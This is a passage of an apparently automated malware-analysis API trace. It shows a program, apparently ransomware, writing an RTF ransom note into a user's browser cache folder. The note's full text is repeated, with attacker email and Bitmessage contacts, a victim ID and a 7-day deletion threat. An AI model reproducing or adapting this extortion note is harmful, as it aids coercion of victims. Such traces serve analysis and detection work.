\\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.669] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.670] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24647a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nLp¬\x9d}67È\x90U«Ôg^úò\x1f$kZ\x02Ã`\x03^", lpUsedDefaultChar=0x0) returned 8717 [0289.670] WriteFile (in: hFile=0x2f0, lpBuffer=0x24647a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24647a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.670] CloseHandle (hObject=0x2f0) returned 1 [0289.673] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service 